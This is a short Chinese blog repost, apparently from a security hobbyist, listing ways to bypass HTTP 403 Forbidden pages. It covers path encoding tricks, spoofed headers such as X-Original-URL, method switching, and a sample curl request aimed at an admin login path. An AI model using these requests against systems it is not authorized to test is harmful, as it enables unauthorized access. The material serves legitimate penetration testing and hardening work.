标签：domain GET www 403 https 简单 绕过 com

403 Forbidden Bypass Technique.

403 Forbidden 是HTTP协议中的一个状态码(Status Code), 白话理解，没有权限访问此站 。 该状态表示服务器处理了本次请求，但是拒绝执行该务 。一般情况站点都是不会允许直接读取目录内容的。

每当发现403页面时，这意味着里面有东西，我们只需要绕过它。绕过403禁止的技术有很多，但在这里暂且讨论我们可以使用的前4种方法。

尝试添加 {%2e} or {%2f} { /*, /./}在第一个斜杠后面!

https://www.domain/DB = 403
https://www.domain/%2e/DB =200
https://www.domain/./DB =200

向请求模块添加头信息

Content-Length: 0
X-rewrite-url
X-Original-URL
X-Custom-IP-Authorization
X-Forwarded-For

Change requested method

GET → POST, GET → TRACE, GET → PUT, GET → OPTIONS

USing CURL

curl -i -s -k -X $’GET’ -H $’Host: account.domain.com’ -H $’X-rewrite-url: admin/login’ $’https://account.domain.com/'

参考博文：https://medium.com/@dufferhackers/403-forbidden-bypass-technique-eda321012baa 　　　　　https://www.likecs.com/show-203584182.html  

 

标签：domain,GET,www,403,https,简单,绕过,com
来源： https://www.cnblogs.com/Gouwa/p/15870337.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。